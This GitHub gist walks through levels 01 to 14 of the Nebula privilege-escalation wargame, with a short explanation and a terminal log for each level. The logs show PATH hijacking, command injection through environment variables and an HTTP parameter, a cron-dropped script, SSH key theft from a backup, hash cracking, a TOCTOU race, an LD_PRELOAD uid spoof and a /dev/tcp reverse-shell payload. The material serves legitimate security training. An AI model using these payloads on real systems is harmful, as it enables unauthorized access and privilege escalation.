Skip to content

Instantly share code, notes, and snippets.

@felmoltor

felmoltor/level01

Last active May 30, 2022 18:20
Show Gist options
  • Save felmoltor/5c1690b2a31a9d7660405482b68d412c to your computer and use it in GitHub Desktop.
Save felmoltor/5c1690b2a31a9d7660405482b68d412c to your computer and use it in GitHub Desktop.
Download ZIP
Nebula Exploit Exercises
Raw
level01
Problem
-------
https://exploit-exercises.com/nebula/level01/
Solution
--------
The binary uses the binary "/usr/bin/env echo" call to show a message to the user.
As /usr/bin/env searches for the specified binary in the PATH variable, we can just fake the "echo" binary with our own binary to get a shell.
----------------
level01@nebula:/home/flag01$ cat /home/level01/echo
/bin/echo "Welcome to your doom"
bash -i
level01@nebula:/home/flag01$ export PATH=/home/level01/:$PATH
level01@nebula:/home/flag01$ ./flag01
Welcome to your doom
flag01@nebula:/home/flag01$ id
uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
flag01@nebula:/home/flag01$
-------------
Raw
level02
Problem
-------
https://exploit-exercises.com/nebula/level02/
Solution
--------
The binary uses as imput of the syscall "system" the environment variable "USER".
This environment variable is under user control and can be modified at desire. The vulnerable call is:
[...]
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
[...]
system(buffer);
[...]
As "buffer" is injectable and then is executed, we can inject commands in the variable USER. For example, the command "bash -i" can be injected to obtain a shell as user "flag02"
-------------
level02@nebula:/home/flag02$ export USER="BLAHBLAH; bash -i; "
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo BLAHBLAH; bash -i; is cool")
BLAHBLAH
flag02@nebula:/home/flag02$ id
uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02)
flag02@nebula:/home/flag02$
Raw
level03
Problem
-------
https://exploit-exercises.com/nebula/level03/
Solution
--------
There is a crontab being executed by user "flag03". This crontab execute the shell script /home/flag03/writable.sh.
This script executes everything that is inside the folder /home/flag03/writable.d/ with "flag03" privileges. We just need to drop in this folder our own shell script to execute code with flag03 user privileges.
-----------------
level03@nebula:/home/flag03$ vim writable.d/hacked.sh
level03@nebula:/home/flag03$ cat writable.d/hacked.sh
#/bin/bash
echo "I am `id` being hacked!" > /home/flag03/beinghacked.txt
level03@nebula:/home/flag03$ ls -l
total 1
drwxrwxrwx 1 flag03 flag03 60 2017-06-20 13:31 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
[...]
level03@nebula:/home/flag03$ ls -l
total 5
-rw-rw-r-- 1 flag03 flag03 70 2017-06-20 13:33 beinghacked.txt
drwxrwxrwx 1 flag03 flag03 40 2017-06-20 13:33 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ cat beinghacked.txt
I am uid=996(flag03) gid=996(flag03) groups=996(flag03) being hacked!
Raw
level04
Problem
-------
https://exploit-exercises.com/nebula/level04/
Solution
--------
Open shell with level04:level04
The program doesn't allow you to read the file with name "token", just make a symbolic link of this forbidden file with a distinct name:
level04@nebula:/home/flag04$ ln -s /home/flag04/token /home/level04/bla
level04@nebula:/home/flag04$ ./flag04 /home/level04/bla
06508b5e-8909-4f38-b630-fdb148a848a2
Raw
level05
Problem
-------
https://exploit-exercises.com/nebula/level05/
Solution
--------
In the /home/flag05 directory there is a .ssh folder where we have no access rights.
There is also a suspicios backup file in /home/flag05/.backup/backup-19072011.tgz
This file seems to contain the ssh files of the .ssh directory, but when extracting we dont have permissions to overwrite the original ones.
We just need to provide to the program a directory where we have write permissions and untar the files there:
level05@nebula:/home/flag05/.backup$ tar tfv backup-19072011.tgz
drwxr-xr-x user/user 0 2011-07-19 02:37 .ssh/
-rw-r--r-- user/user 394 2011-07-19 02:37 .ssh/id_rsa.pub
-rw------- user/user 1675 2011-07-19 02:37 .ssh/id_rsa
-rw-r--r-- user/user 394 2011-07-19 02:37 .ssh/authorized_keys
level05@nebula:/home/flag05/.backup$ tar xzfv backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
[...]
level05@nebula:/home/flag05/.backup$ mkdir /home/level05/lo_tuyo_pa_mi
level05@nebula:/home/flag05/.backup$ tar xzfv backup-19072011.tgz -C /home/level05/lo_tuyo_pa_mi/
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:/home/flag05/.backup$ ssh flag05@localhost -i /home/level05/lo_tuyo_pa_mi/.ssh/id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
_ __ __ __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag05@nebula:~$ whoami
flag05
flag05@nebula:~$ ls
flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
Raw
level06
Problem
-------
Solution
--------
The hint of the level says:
"The flag06 account credentials came from a legacy unix system."
The credentials of the user "flag06" can be found ciphered in file /etc/passwd instead in /etc/shadow. Dump the credentials and crack them with John the ripper on a second machine.
-------------
level06@nebula:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
flag05:x:994:994::/home/flag05:/bin/sh
level06:x:1007:1007::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
[...]
------
root@kali:~/nebula/level06# john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (flag06)
1g 0:00:00:00 DONE 2/3 (2017-06-20 13:22) 6.666g/s 5000p/s 5000c/s 5000C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
---------
level06@nebula:~$ su flag06
Password: <----- Insert "hello" as a password
sh-4.2$ bash
flag06@nebula:/home/level06$ whoami
flag06
Raw
level07
Problem
-------
Solution
--------
The user level07 can execute a simple web server "thttpd" with the configuration file provided by flag07 user.
The configuration file tells the program to execute the file "index.cgi" with a command injection in parameter "Host" with user privileges of "flag07".
-------
level07@nebula:/home/flag07$ ls -l
total 5
-rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf
level07@nebula:/home/flag07$ thttpd -C thttpd.conf (http://acme.com/software/thttpd/thttpd_man.html)
level07@nebula:/home/flag07$ netstat -natop
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 127.0.0.1:50001 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 0.0.0.0:10007 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 192.168.15.135:22 192.168.15.1:6021 ESTABLISHED - keepalive (6319.27/0/0)
tcp 0 0 192.168.15.135:22 192.168.15.1:47547 ESTABLISHED - keepalive (191.27/0/0)
tcp6 0 0 :::22 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 :::7007 :::* LISTEN 875/thttpd off (0.00/0/0)
----------------
Open a web browser to the nebula server on port 7007 and inject the command "id" by appending the "id" command to an OR condition "||":
http://192.168.15.135:7007/index.cgi?Host=5||id
uid=1008(level07) gid=1008(level07) groups=1008(level07)
Raw
level08
Solution
--------
Accessing with user level08.
In /home/flag08 there is a readable file "capture.pcap".
This file is downloaded and open with wireshark. Following the TCP flow and showing data as "Hex Dump" we can find the following conversation:
[...]
00000055 ff fa 22 03 03 e2 03 04 82 0f 07 e2 1c 08 82 04 .."..... ........
00000065 09 c2 1a 0a 82 7f 0b 82 15 0f 82 11 10 82 13 11 ........ ........
00000075 82 ff ff 12 82 ff ff ff f0 ........ .
0000007E 0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38 ..Linux 2.6.38-8
0000008E 2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a -generic -pae (::
0000009E 66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28 ffff:10. 1.1.2) (
000000AE 70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62 pts/10). ....wwwb
000000BE 75 67 73 20 6c 6f 67 69 6e 3a 20 ugs logi n:
000000B2 6c l
000000C9 00 6c .l
000000B3 65 e
000000CB 00 65 .e
000000B4 76 v
000000CD 00 76 .v
000000B5 65 e
000000CF 00 65 .e
000000B6 6c l
000000D1 00 6c .l
000000B7 38 8
000000D3 00 38 .8
000000B8 0d .
000000D5 01 .
000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord:
000000B9 62 b
000000BA 61 a
000000BB 63 c
000000BC 6b k
000000BD 64 d
000000BE 6f o
000000BF 6f o
000000C0 72 r
000000C1 7f .
000000C2 7f .
000000C3 7f .
000000C4 30 0
000000C5 30 0
000000C6 52 R
000000C7 6d m
000000C8 38 8
000000C9 7f .
000000CA 61 a
000000CB 74 t
000000CC 65 e
000000CD 0d .
[...]
The hexadecimal characters "7F" represent the backspace, so the final password of the users is: backd00Rmate.
Elevate with this password and user "flag08" and get access:
level08@nebula:/home/flag08$ su flag08
Password:
sh-4.2$ bash
flag08@nebula:~$ whoami
flag08
flag08@nebula:~$ id
uid=991(flag08) gid=991(flag08) groups=991(flag08)
flag08@nebula:~$
Raw
level10
Problem
-------
https://exploit-exercises.com/nebula/level10/
Solution
--------
The file we want to read is /home/flag10/token and we dont have permissions.
The program that can read the file is capable of sending it to an IP to TCP port 18211 in case that we have permissions to read the file.
The program flow shows a vulnerability of type TOCTOU (https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use):
1. At time 0 (t0) the program check the access we have to the token file
2. At time 1 (t1) the program sends the file to the remote IP
Between t0 and t1, the file can change its permissions and the check that was done in t0 is no longer valid.
We can make an infinite and fast loop alternating symbolic links pointing to the token file and a random file in with we have read permissions to take advantage of the program.
To do it we open 4 screens:
Screen 1
--------
Execute an infinite loop that alternates a symbolic link (/home/level10/blah) between /home/flag10/token and /tmp/level10stuff:
level10@nebula:/home/flag10$ while [ 1 ]; do ln -sf /tmp/level10stuff /home/level10/blah; ln -sf /home/flag10/token /home/level10/blah ; done
Screen 2
--------
Start a netcat listening contniuosly on port 18221 and dumping the received contents to /tmp/level10dump:
level10@nebula:/home/flag10$ nc -nlvk 18211 > /tmp/level10dump
Connection from 127.0.0.1 port 18211 [tcp/*] accepted
Connection from 127.0.0.1 port 18211 [tcp/*] accepted
[...]
Screen 3
--------
Execute an infinite loop of the program flag10 that sends the file /home/level10/blah to localhost:
level10@nebula:/home/flag10$ while [ 1 ]; do ./flag10 /home/level10/blah 127.0.0.1; done
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
Connecting to 127.0.0.1:18211 .. Connected!
Sending file .. wrote file!
You don't have access to /home/level10/blah
Connecting to 127.0.0.1:18211 .. Connected!
Sending file .. wrote file!
You don't have access to /home/level10/blah
Connecting to 127.0.0.1:18211 .. Connected!
Sending file .. wrote file!
You don't have access to /home/level10/blah
You don't have access to /home/level10/blah
Connecting to 127.0.0.1:18211 .. Connected!
Sending file .. wrote file!
[...]
Screen 4
--------
Monitorize the file /tmp/level10stuff to see when the token is received:
level10@nebula:/home/flag10$ tail -f /tmp/level10dump | grep -v "nah"
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
[...]
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
Raw
level12
Problem
-------
https://exploit-exercises.com/nebula/level12/
Solution
--------
The "hash" function is prone to remote code execution. Bash commands are injectable through the variable "password".
Instead of sending a string with the password we can send bash commands.
-------------------
In terminal 1:
level12@nebula:~$ netstat -natop
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 127.0.0.1:50001 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 0.0.0.0:10007 0.0.0.0:* LISTEN - off (0.00/0/0)
[...]
level12@nebula:~$ nc 127.0.0.1 50001
Password: "A" && bash -i >& /dev/tcp/127.0.0.1/6969 0>&1
-------------------
In terminal 2:
level12@nebula:~$ nc -nl 6969
bash: no job control in this shell
flag12@nebula:/$ id
id
uid=987(flag12) gid=987(flag12) groups=987(flag12)
flag12@nebula:/$ whoami
whoami
flag12
flag12@nebula:/$ echo "pwned" > /home/flag12/sorry.txt
echo "pwned" > /home/flag12/sorry.txt
flag12@nebula:/$ cat /home/flag12/sorry.txt
cat /home/flag12/sorry.txt
pwned
flag12@nebula:/$
------------------------
Raw
level13
Problem
-------
https://exploit-exercises.com/nebula/level13/
Solution
--------
The code of the excersice shows that the important part of the program will only be executed if the UID is equal to 1000 (user nebula in the machine).
The call to getuid() can be faked with our own library implementing getuid() function and using LD_PRELOAD trick.
The tricky part of this exercise is that you also need to copy the "flag13" file to change ownership of this executable for this trick to work. Another way is to execute the "flag13" through another binary like "gdb" or "strace" instead of copying the executable.
------------------------
Create file "redefine.c" with this content:
----
#include <unistd.h>
uid_t geteuid() {
return FAKE_UID;
}
uid_t getuid() {
return FAKE_UID;
}
-----
Compile the file to create a library with this options:
$ gcc -DFAKE_UID=1000 -shared -fPIC -o redefine.so redefine.c
------
Copy the executable /home/flag13/flag13 to your home folder and execute by using LD_PRELOAD like this:
level13@nebula:~$ LD_PRELOAD=./redefine.so ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
level13@nebula:~$ su flag13
Password:
sh-4.2$ id
uid=986(flag13) gid=986(flag13) groups=986(flag13)
sh-4.2$ exit
------
Another way to obtain the token, instad of copy the file is using "strace", "ltrace", "gdb" or similar program:
level13@nebula:~$ LD_PRELOAD=./redefine.so strace /home/flag13/flag13
execve("/home/flag13/flag13", ["/home/flag13/flag13"], [/* 22 vars */]) = 0
brk(0) = 0x911e000
[...]
write(1, "your token is b705702b-76a8-42b0"..., 51your token is b705702b-76a8-42b0-8844-3adabbe5ac58
) = 51
exit_group(51) = ?
Raw
level14
Problem
-------
https://exploit-exercises.com/nebula/level14/
Solution
--------
This problem does not have any asociated code.
The flag14 executable has only one function, to encrypt the stdin input with a super secret encryption algorithm.
The algorithm can be infered by providing to the file repetitive input to see if the output is a recognizable pattern.
By providing a string of 127 '\x00' characters we can see that the program just add to the ordinal of the character the position of the character.
-------------
level14@nebula:~$ python -c "print '\x00'*127" | /home/flag14/flag14 -e
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�level14@nebula:~$ python -c "print '\x00'*127" | /home/flag14/flag14 -e^C
[...]
level14@nebula:~$ cat decrypt.py
#!/usr/bin/env python
import os,sys
if len(sys.argv) <= 1:
print "Usage: %s <encryptedfile>" % sys.argv[0]
exit(0)
f = open(sys.argv[1],"r")
s = f.read()
print "To decrypt: %s " % s
position=0
result=""
for c in s:
result=result+chr(((ord(c)-position)%256))
position+=1
print "Decrypted: %s" % result
---------------
level14@nebula:~$ ./decrypt.py /home/flag14/token
To decrypt: 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
Decrypted: 8457c118-887c-4e40-a5a6-33a25353165�
level14@nebula:~$ su flag14
Password:
sh-4.2$ id
uid=985(flag14) gid=985(flag14) groups=985(flag14)
sh-4.2$ exit
exit
level14@nebula:~$
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment